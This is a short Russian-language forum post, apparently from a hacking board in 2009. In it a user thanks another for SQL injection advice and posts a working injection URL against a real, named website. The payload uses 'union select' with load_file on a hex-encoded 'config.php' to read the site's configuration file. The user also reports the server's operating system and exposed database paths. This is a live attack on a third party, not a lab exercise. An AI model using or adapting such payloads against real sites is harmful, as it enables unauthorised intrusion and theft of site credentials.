16.02.2009, 17:23
|
|
Познающий
Регистрация: 14.02.2009
Сообщений: 45
С нами:
9072487
Репутация:
74
|
|
Сообщение от Pashkela
просто вызываешь ошибку, 1 никогда не будет равен 0, вместо запятой или минуса, нарушаешь логику sql-запроса, способо много, от кавычки до or, читай статью
Спасибо, логично. Я пытался минусом и кавычкой, но не выводилось ничего.
http://www.yivo.org/index.php?tid=1+and+1=0+union+select+1,2,3,load_fi le(0x636F6E6669672E706870),5,6,7,8,9/*
Значит load_file работает? + Сервер на виндовсе стоит... + Расскрыте путей DB! Спасибо!
|
|
|